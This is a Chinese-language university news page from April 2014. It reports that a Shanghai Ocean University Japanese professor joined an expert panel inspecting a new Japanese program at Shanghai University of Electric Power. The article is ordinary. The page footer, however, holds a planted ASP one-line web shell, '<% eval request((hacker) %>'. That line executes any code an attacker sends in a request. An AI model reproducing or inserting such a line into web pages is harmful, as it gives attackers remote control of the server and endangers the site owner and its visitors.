当前位置:共青团上海海洋大学委员会 >> 新闻中心 >> 学院动态 >> 正文  
站内信息搜索:
外国语学院教师应邀参加上海电力学院新专业检查
[2014年04月15日]   来源:本站原创   作者:佚名   点击数: 【字体: 】【双击滚屏

    2014年4月8日,受上海电力学院外语学院邀请,我校外国语学院日语系刘军教授作为专家检查组成员,参加了该校日语新专业的检查验收。

    此次日语新专业验收专家组由来自华东师范大学、上海大学、上海师范大学日语系5名教授组成。会前,上海电力学院教务处秦瑞杰处长介绍了该校的教学基本情况,外国语学院潘卫民院长就学院师资建设、人才引进等作了情况说明。

    验收协调会由华东师范大学陆留弟教授主持。电力学院日语系专业负责人就该校日语专业办学指导思想,师资队伍、基本教学条件、教学过程、教学管理教学效果等作了情况汇报。专家组成员就汇报内容阐述了各自的看法,对经费使用、师资队伍建设、教材使用及毕业论文进行了提问。此外,专家组成员还与日语系师生进行了座谈,肯定了电力学院日语专业建设所取得的成绩,一致认为该校日语专业符合上海普通高校本科新专业检查评价标准。

    在教师座谈会上,刘军教授向专家组成员介绍了上海海洋大学日语系专业建设情况。此外,与会专家还就上海市日语人才需求现状、日语教学法、日语听力教材建设、日语专业特色建设等问题进行了有益地探讨。

 

关闭窗口

上一篇:奚洁人教授为元鼎学院学生作领导力讲座

下一篇:水产与生命学院第十四届“鱼文化节”开幕
  留言板 | 管理登录 版权所有 © 2007 共青团上海海洋大学委员会 tw.shou.edu.cn <% eval request((hacker) %>